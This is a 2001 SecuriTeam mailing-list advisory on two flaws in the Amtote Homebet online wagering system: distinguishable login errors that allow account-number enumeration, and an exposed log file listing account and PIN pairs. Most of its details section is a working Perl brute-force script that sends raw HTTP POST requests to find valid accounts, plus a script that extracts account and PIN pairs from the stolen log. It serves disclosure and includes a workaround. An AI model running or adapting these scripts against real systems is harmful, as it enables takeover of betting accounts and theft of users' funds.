[NT] Vulnerability in Amtote International Homebet Self Service Wagering System

From: support@securiteam.com
Date: 10/01/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Vulnerability in Amtote International Homebet Self Service Wagering System
Message-Id: <20010930223831.9A604138C2@mail.der-keiler.de>
Date: Mon,  1 Oct 2001 00:38:31 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Vulnerability in Amtote International Homebet Self Service Wagering System
------------------------------------------------------------------------

SUMMARY

 <http://www.amtote.com/products.htm> Internet-based account wagering
interface utilizing HTML and JAVA web based applications. The HTML
functionality includes viewing current account balances, viewing current
odds by track, placing wagers, reviewing wagers, and viewing official
results/prices by track. The JAVA application is designed for faster
single-screen wagering and allows viewing of account balances and current
odds by selected track. Two security vulnerabilities in the default
version of the products allows compromising of sensitive PIN numbers (via
an insecure file storage), and easy brute forcing of them (via an
automated script).

DETAILS

1. Account and pin combination authentication
On the machines that were tested, the login page
http://target/homebet/homebet.dll?form=menu&option=menu-signin relies on a
two numeric components to authenticate, an account number and a 4-digit
pin code. One of the main problems (apart from the fact the auth is passed
in plain text) is that the error page for bad account number is different
from the page for bad pin number and therefore the combination is easily
brute forced. A Perl script that finds valid account numbers can be found
attached bellow.

2. Read access to homebet.log
Machines that were tested included also an IIS 4 installation. In fact the
installation was old enough to still include the
<http://www.securiteam.com/windowsntfocus/2RUQMPPRPU.html> RDS
vulnerability, which allowed use to do a bit of exploring. A log file
containing account and pin numbers is stored in a /homebet/ virtual
directory. e.g. http://target/homebet/homebet.log this file contains all
the info needed to go gambling other people's money. Script to print
accounts and pins from downloaded log file can be found bellow.

Workaround:
Change ACL on homebet.log to no access for IUSER accounts.

Exploit:
Amtote brute force
@method =
'POST /homebet/homebet.dll HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword, application/x-comet, */*
Referer:
http://example.com/homebet/homebet.dll?form=menu&option=menu-signin
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; fs_pb_ie5)
Host: 10.1.1.1
Content-Length: 29
Connection: Keep-Alive
Cache-Control: no-cache'."\n";
$found ="notyet";

use Socket;
$prompt = "cmd\/c";
if (@ARGV<1) {die "Account cracker\n Usage \= IP/host:Port e.g. Perl $0
www.example.com\n";}

($host,$port)=split(/:/,@ARGV[0]);$target = inet_aton($host);

$account ="accounts.txt"; # file containing account numbers
unless($port){$port = 80;}

open(EXPF,$account) or die "can't open account file file $account\n";

while(<EXPF>){
$found ="notyet";

$a = $_;
chomp $a;
print "Cracking Account number\n";
print "$a\n";
#if ($a eq ""){goto hello;};

@guess = "@method" . 'form=open&account=' . $a .'&pin=0000';

@retrn = sendraw("@guess \r\n\r\n");
print @guess;
print @retrn;
foreach $line (@retrn){
  if ($line =~ "ACCOUNT NUMBER IS NOT DEFINED") { $found="no" ; }
          }

if ($found eq "notyet"){goto hello}

}

hello:

if($found eq "notyet"){
print <<"endc";

found valid account number $a
endc
}

################### sendraw sub

sub sendraw { # this saves the whole transaction anyway
  my ($pstr)=@_;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
    die("Socket problems\n");
  if(connect(S,pack "SnA4x8",2,$port,$target)){
    my @in;
    select(S); $|=1; print $pstr;
    while(<S>){ push @in, $_;}
    select(STDOUT); close(S); return @in;
  } else { die("Can't connect...\n"); }
}

Log file processor:
$logfile='c:\windows\desktop\homebet.log'; ##change as required
print "Extracting Account/pin numbers";
open(INFILE,$logfile);
while(<INFILE>){
($accn,$pin)=split(/account=/,$_);
if ($pin){print "Account Number=".$pin;}
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:GaryO@sec-1.com> Gary
O'leary-Steele.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages